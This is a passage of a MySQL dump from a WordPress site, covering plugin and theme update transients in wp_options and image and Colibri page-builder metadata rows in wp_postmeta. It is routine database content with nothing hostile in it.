";a:1:{s:10:\"forminator\";i:1666629100;}s:5:\"queue\";a:1:{s:10:\"forminator\";a:3:{s:5:\"email\";i:1666629100;s:4:\"rate\";i:1667233900;s:8:\"giveaway\";i:1666801900;}}s:4:\"done\";a:0:{}}','no'),(259540,'using_application_passwords','1','no'),(261991,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:6:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.7.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.7.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.7.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.7.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.7.1\";s:7:\"version\";s:5:\"6.7.1\";s:11:\"php_version\";s:6:\"7.2.24\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:51:\"https://downloads.w.org/release/wordpress-6.7.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:51:\"https://downloads.w.org/release/wordpress-6.7.1.zip\";s:10:\"no_content\";s:62:\"https://downloads.w.org/release/wordpress-6.7.1-no-content.zip\";s:11:\"new_bundled\";s:63:\"https://downloads.w.org/release/wordpress-6.7.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.7.1\";s:7:\"version\";s:5:\"6.7.1\";s:11:\"php_version\";s:6:\"7.2.24\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:51:\"https://downloads.w.org/release/wordpress-6.6.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:51:\"https://downloads.w.org/release/wordpress-6.6.2.zip\";s:10:\"no_content\";s:62:\"https://downloads.w.org/release/wordpress-6.6.2-no-content.zip\";s:11:\"new_bundled\";s:63:\"https://downloads.w.org/release/wordpress-6.6.2-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.6.2\";s:7:\"version\";s:5:\"6.6.2\";s:11:\"php_version\";s:6:\"7.2.24\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:51:\"https://downloads.w.org/release/wordpress-6.5.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:51:\"https://downloads.w.org/release/wordpress-6.5.5.zip\";s:10:\"no_content\";s:62:\"https://downloads.w.org/release/wordpress-6.5.5-no-content.zip\";s:11:\"new_bundled\";s:63:\"https://downloads.w.org/release/wordpress-6.5.5-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.5.5\";s:7:\"version\";s:5:\"6.5.5\";s:11:\"php_version\";s:5:\"7.0.0\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:4;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:51:\"https://downloads.w.org/release/wordpress-6.4.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:51:\"https://downloads.w.org/release/wordpress-6.4.5.zip\";s:10:\"no_content\";s:62:\"https://downloads.w.org/release/wordpress-6.4.5-no-content.zip\";s:11:\"new_bundled\";s:63:\"https://downloads.w.org/release/wordpress-6.4.5-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.4.5\";s:7:\"version\";s:5:\"6.4.5\";s:11:\"php_version\";s:5:\"7.0.0\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:5;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:51:\"https://downloads.w.org/release/wordpress-6.3.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:51:\"https://downloads.w.org/release/wordpress-6.3.5.zip\";s:10:\"no_content\";s:62:\"https://downloads.w.org/release/wordpress-6.3.5-no-content.zip\";s:11:\"new_bundled\";s:63:\"https://downloads.w.org/release/wordpress-6.3.5-new-bundled.zip\";s:7:\"partial\";s:61:\"https://downloads.w.org/release/wordpress-6.3.5-partial-1.zip\";s:8:\"rollback\";s:62:\"https://downloads.w.org/release/wordpress-6.3.5-rollback-1.zip\";}s:7:\"current\";s:5:\"6.3.5\";s:7:\"version\";s:5:\"6.3.5\";s:11:\"php_version\";s:5:\"7.0.0\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:5:\"6.3.1\";s:9:\"new_files\";s:0:\"\";}}s:12:\"last_checked\";i:1732921209;s:15:\"version_checked\";s:5:\"6.3.1\";s:12:\"translations\";a:0:{}}','no'),(262063,'can_compress_scripts','1','yes'),(262261,'forminator_default_report_entry','1','yes'),(262398,'ccj__activation_time','1696013150','yes'),(262399,'ccj__version','3.44','yes'),(262401,'custom-css-js-tree','a:1:{s:25:\"frontend-html-footer-both\";a:4:{i:0;s:9:\"1834.html\";i:1;s:9:\"1832.html\";i:2;s:9:\"1594.html\";i:3;s:9:\"1593.html\";}}','yes'),(311671,'_transient_colibri_page_builder_cache','a:2:{i:0;b:0;s:4:\"logo\";a:1:{s:14:\"logo-alt-image\";a:1:{s:32:\"4fb361f3001cf4024a2f3ece20951cbf\";i:7;}}}','yes'),(312669,'_site_transient_timeout_php_check_6db38e822b455ffc41aae2038562713f','1733337286','no'),(312670,'_site_transient_php_check_6db38e822b455ffc41aae2038562713f','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"7.2.24\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(312769,'_site_transient_timeout_theme_roots','1732923009','no'),(312770,'_site_transient_theme_roots','a:3:{s:10:\"colibri-wp\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','no'),(312771,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1732921210;s:7:\"checked\";a:3:{s:10:\"colibri-wp\";s:6:\"1.0.93\";s:17:\"twentytwentythree\";s:3:\"1.2\";s:15:\"twentytwentytwo\";s:3:\"1.4\";}s:8:\"response\";a:3:{s:10:\"colibri-wp\";a:6:{s:5:\"theme\";s:10:\"colibri-wp\";s:11:\"new_version\";s:7:\"1.0.137\";s:3:\"url\";s:40:\"https://wordpress.org/themes/colibri-wp/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/colibri-wp.1.0.137.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.6.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"1.9\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.9.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:0:{}s:12:\"translations\";a:0:{}}','no'),(312772,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1732921210;s:8:\"response\";a:3:{s:45:\"colibri-page-builder/colibri-page-builder.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:34:\"w.org/plugins/colibri-page-builder\";s:4:\"slug\";s:20:\"colibri-page-builder\";s:6:\"plugin\";s:45:\"colibri-page-builder/colibri-page-builder.php\";s:11:\"new_version\";s:7:\"1.0.315\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/colibri-page-builder/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/colibri-page-builder.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/colibri-page-builder/assets/icon-256x256.gif?rev=2748397\";s:2:\"1x\";s:73:\"https://ps.w.org/colibri-page-builder/assets/icon-128x128.gif?rev=2748397\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:75:\"https://ps.w.org/colibri-page-builder/assets/banner-772x250.jpg?rev=2748397\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"6.7.1\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:31:\"custom-css-js/custom-css-js.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:27:\"w.org/plugins/custom-css-js\";s:4:\"slug\";s:13:\"custom-css-js\";s:6:\"plugin\";s:31:\"custom-css-js/custom-css-js.php\";s:11:\"new_version\";s:4:\"3.49\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/custom-css-js/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/custom-css-js.3.49.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/custom-css-js/assets/icon-128x128.png?rev=1303730\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/custom-css-js/assets/banner-1544x500.png?rev=1770945\";s:2:\"1x\";s:68:\"https://ps.w.org/custom-css-js/assets/banner-772x250.png?rev=1303730\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.0.1\";s:6:\"tested\";s:5:\"6.7.1\";s:12:\"requires_php\";s:5:\"5.2.4\";s:16:\"requires_plugins\";a:0:{}}s:31:\"team-showcase-supreme/index.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:35:\"w.org/plugins/team-showcase-supreme\";s:4:\"slug\";s:21:\"team-showcase-supreme\";s:6:\"plugin\";s:31:\"team-showcase-supreme/index.php\";s:11:\"new_version\";s:3:\"7.3\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/team-showcase-supreme/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/team-showcase-supreme.7.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/team-showcase-supreme/assets/icon-256x256.png?rev=2597164\";s:2:\"1x\";s:74:\"https://ps.w.org/team-showcase-supreme/assets/icon-256x256.png?rev=2597164\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:76:\"https://ps.w.org/team-showcase-supreme/assets/banner-772x250.png?rev=2597173\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:6:\"4.6.14\";s:6:\"tested\";s:5:\"6.7.1\";s:12:\"requires_php\";s:3:\"5.6\";s:16:\"requires_plugins\";a:0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:1:{s:25:\"forminator/forminator.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:24:\"w.org/plugins/forminator\";s:4:\"slug\";s:10:\"forminator\";s:6:\"plugin\";s:25:\"forminator/forminator.php\";s:11:\"new_version\";s:6:\"1.37.1\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/forminator/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/forminator.1.37.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/forminator/assets/icon-256x256.png?rev=2746202\";s:2:\"1x\";s:63:\"https://ps.w.org/forminator/assets/icon-128x128.png?rev=2746202\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/forminator/assets/banner-1544x500.png?rev=2626060\";s:2:\"1x\";s:65:\"https://ps.w.org/forminator/assets/banner-772x250.png?rev=2626060\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.4\";s:6:\"tested\";s:5:\"6.7.1\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}}s:7:\"checked\";a:4:{s:45:\"colibri-page-builder/colibri-page-builder.php\";s:7:\"1.0.236\";s:25:\"forminator/forminator.php\";s:6:\"1.26.0\";s:31:\"custom-css-js/custom-css-js.php\";s:4:\"3.44\";s:31:\"team-showcase-supreme/index.php\";s:3:\"5.1\";}}','no');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=2676 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (2,3,'_wp_page_template','default'),(5,7,'_wp_attached_file','2022/02/DICE-log-6-sides-Largbox_text-e1644937921882.png'),(6,7,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:94;s:4:\"file\";s:56:\"2022/02/DICE-log-6-sides-Largbox_text-e1644937921882.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"DICE-log-6-sides-Largbox_text-300x282.png\";s:5:\"width\";i:300;s:6:\"height\";i:282;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"DICE-log-6-sides-Largbox_text-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"DICE-log-6-sides-Largbox_text-768x723.png\";s:5:\"width\";i:768;s:6:\"height\";i:723;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7,8,'origin','theme'),(8,9,'origin','theme'),(9,7,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:880;s:6:\"height\";i:828;s:4:\"file\";s:33:\"DICE-log-6-sides-Largbox_text.png\";}s:18:\"full-1644937905480\";a:3:{s:5:\"width\";i:500;s:6:\"height\";i:470;s:4:\"file\";s:48:\"DICE-log-6-sides-Largbox_text-e1644937900408.png\";}s:18:\"full-1644937910612\";a:3:{s:5:\"width\";i:300;s:6:\"height\";i:282;s:4:\"file\";s:48:\"DICE-log-6-sides-Largbox_text-e1644937905480.png\";}s:18:\"full-1644937921882\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:188;s:4:\"file\";s:48:\"DICE-log-6-sides-Largbox_text-e1644937910612.png\";}}'),(31,18,'_wp_attached_file','2022/02/header-scaled.jpg'),(32,18,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:709;s:4:\"file\";s:25:\"2022/02/header-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:3:{s:4:\"file\";s:17:\"header-300x83.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:83;}s:5:\"large\";a:3:{s:4:\"file\";s:19:\"header-1024x283.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:283;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:18:\"header-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:18:\"header-768x213.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:213;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:19:\"header-1536x425.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:425;}s:9:\"2048x2048\";a:3:{s:4:\"file\";s:19:\"header-2048x567.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:567;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1644921318\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:10:\"header.jpg\";s:15:\"image-converter\";a:6:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";s:9:\"2048x2048\";s:3:\"IME\";}}'),(36,20,'_wp_page_template','page-templates/homepage.php'),(37,20,'is_colibri-wp_front_page','1'),(38,22,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:864;i:29;i:865;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(40,25,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(42,28,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(44,31,'extend_builder','a:2:{s:4:\"json\";i:32;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:66;i:1;i:67;i:2;i:72;i:3;i:73;i:4;i:74;i:5;i:75;i:6;i:76;i:7;i:77;i:8;i:78;i:9;i:79;i:10;i:80;i:11;i:81;i:12;i:82;i:13;i:83;i:14;i:84;i:15;i:85;i:16;i:86;i:17;i:87;i:18;i:88;i:19;i:89;i:20;i:90;i:21;i:91;i:22;i:92;i:23;i:93;i:24;i:68;i:25;i:69;i:26;i:70;i:27;i:71;i:28;i:94;i:29;i:99;i:30;i:100;i:31;i:101;i:32;i:102;i:33;i:95;i:34;i:96;i:35;i:97;i:36;i:98;}}}'),(45,33,'extend_builder','a:1:{s:4:\"json\";i:32;}'),(46,34,'extend_builder','a:2:{s:4:\"json\";i:35;s:4:\"meta\";a:2:{s:5:\"34-m3\";a:1:{s:4:\"data\";a:1:{s:14:\"targetSelector\";N;}}s:9:\"styleRefs\";a:28:{i:0;i:103;i:1;i:104;i:2;i:109;i:3;i:110;i:4;i:111;i:5;i:112;i:6;i:113;i:7;i:114;i:8;i:115;i:9;i:116;i:10;i:117;i:11;i:118;i:12;i:119;i:13;i:120;i:14;i:121;i:15;i:122;i:16;i:123;i:17;i:124;i:18;i:125;i:19;i:126;i:20;i:127;i:21;i:128;i:22;i:129;i:23;i:130;i:24;i:105;i:25;i:106;i:26;i:107;i:27;i:108;}}}'),(47,36,'extend_builder','a:1:{s:4:\"json\";i:35;}'),(48,37,'extend_builder','a:2:{s:4:\"json\";i:38;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:7:{i:0;i:131;i:1;i:132;i:2;i:133;i:3;i:134;i:4;i:135;i:5;i:136;i:6;i:137;}}}'),(49,39,'extend_builder','a:1:{s:4:\"json\";i:38;}'),(50,40,'extend_builder','a:2:{s:4:\"json\";i:41;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:22:{i:0;i:138;i:1;i:139;i:2;i:140;i:3;i:141;i:4;i:142;i:5;i:143;i:6;i:144;i:7;i:145;i:8;i:146;i:9;i:147;i:10;i:148;i:11;i:149;i:12;i:150;i:13;i:151;i:14;i:152;i:15;i:153;i:16;i:154;i:17;i:155;i:18;i:156;i:19;i:157;i:20;i:158;i:21;i:159;}}}'),(51,42,'extend_builder','a:1:{s:4:\"json\";i:41;}'),(52,43,'extend_builder','a:2:{s:4:\"json\";i:44;s:4:\"meta\";a:2:{s:5:\"43-s5\";a:1:{s:4:\"data\";a:1:{s:21:\"componentsWithEffects\";a:0:{}}}s:9:\"styleRefs\";a:16:{i:0;i:160;i:1;i:161;i:2;i:166;i:3;i:167;i:4;i:168;i:5;i:169;i:6;i:170;i:7;i:171;i:8;i:172;i:9;i:173;i:10;i:174;i:11;i:175;i:12;i:162;i:13;i:163;i:14;i:164;i:15;i:165;}}}'),(53,45,'extend_builder','a:1:{s:4:\"json\";i:44;}'),(54,46,'extend_builder','a:2:{s:4:\"json\";i:47;s:4:\"meta\";a:2:{s:5:\"46-s5\";a:1:{s:4:\"data\";a:1:{s:21:\"componentsWithEffects\";a:0:{}}}s:9:\"styleRefs\";a:16:{i:0;i:176;i:1;i:177;i:2;i:182;i:3;i:183;i:4;i:184;i:5;i:185;i:6;i:186;i:7;i:187;i:8;i:188;i:9;i:189;i:10;i:190;i:11;i:191;i:12;i:178;i:13;i:179;i:14;i:180;i:15;i:181;}}}'),(55,48,'extend_builder','a:1:{s:4:\"json\";i:47;}'),(56,50,'extend_builder','a:2:{s:4:\"json\";i:44;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:16:{i:0;i:160;i:1;i:161;i:2;i:162;i:3;i:163;i:4;i:164;i:5;i:165;i:6;i:166;i:7;i:167;i:8;i:168;i:9;i:169;i:10;i:170;i:11;i:171;i:12;i:172;i:13;i:173;i:14;i:174;i:15;i:175;}}}'),(57,52,'extend_builder','a:2:{s:4:\"json\";i:47;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:16:{i:0;i:176;i:1;i:177;i:2;i:178;i:3;i:179;i:4;i:180;i:5;i:181;i:6;i:182;i:7;i:183;i:8;i:184;i:9;i:185;i:10;i:186;i:11;i:187;i:12;i:188;i:13;i:189;i:14;i:190;i:15;i:191;}}}'),(61,60,'extend_builder','a:2:{s:4:\"json\";i:38;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:7:{i:0;i:131;i:1;i:132;i:2;i:133;i:3;i:134;i:4;i:135;i:5;i:136;i:6;i:137;}}}'),(62,62,'extend_builder','a:2:{s:4:\"json\";i:32;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:37:{i:0;i:66;i:1;i:67;i:2;i:68;i:3;i:69;i:4;i:70;i:5;i:71;i:6;i:72;i:7;i:73;i:8;i:74;i:9;i:75;i:10;i:76;i:11;i:77;i:12;i:78;i:13;i:79;i:14;i:80;i:15;i:81;i:16;i:82;i:17;i:83;i:18;i:84;i:19;i:85;i:20;i:86;i:21;i:87;i:22;i:88;i:23;i:89;i:24;i:90;i:25;i:91;i:26;i:92;i:27;i:93;i:28;i:94;i:29;i:95;i:30;i:96;i:31;i:97;i:32;i:98;i:33;i:99;i:34;i:100;i:35;i:101;i:36;i:102;}}}'),(63,64,'extend_builder','a:2:{s:4:\"json\";i:35;s:4:\"meta\";a:2:{s:5:\"34-m3\";a:1:{s:4:\"data\";a:1:{s:14:\"targetSelector\";N;}}s:9:\"styleRefs\";a:28:{i:0;i:103;i:1;i:104;i:2;i:105;i:3;i:106;i:4;i:107;i:5;i:108;i:6;i:109;i:7;i:110;i:8;i:111;i:9;i:112;i:10;i:113;i:11;i:114;i:12;i:115;i:13;i:116;i:14;i:117;i:15;i:118;i:16;i:119;i:17;i:120;i:18;i:121;i:19;i:122;i:20;i:123;i:21;i:124;i:22;i:125;i:23;i:126;i:24;i:127;i:25;i:128;i:26;i:129;i:27;i:130;}}}'),(64,66,'extend_builder','a:2:{s:4:\"json\";i:41;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:22:{i:0;i:138;i:1;i:139;i:2;i:140;i:3;i:141;i:4;i:142;i:5;i:143;i:6;i:144;i:7;i:145;i:8;i:146;i:9;i:147;i:10;i:148;i:11;i:149;i:12;i:150;i:13;i:151;i:14;i:152;i:15;i:153;i:16;i:154;i:17;i:155;i:18;i:156;i:19;i:157;i:20;i:158;i:21;i:159;}}}'),(65,68,'extend_builder','a:2:{s:4:\"json\";i:44;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:16:{i:0;i:160;i:1;i:161;i:2;i:162;i:3;i:163;i:4;i:164;i:5;i:165;i:6;i:166;i:7;i:167;i:8;i:168;i:9;i:169;i:10;i:170;i:11;i:171;i:12;i:172;i:13;i:173;i:14;i:174;i:15;i:175;}}}'),(69,76,'extend_builder','a:2:{s:4:\"json\";i:38;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:7:{i:0;i:131;i:1;i:132;i:2;i:133;i:3;i:134;i:4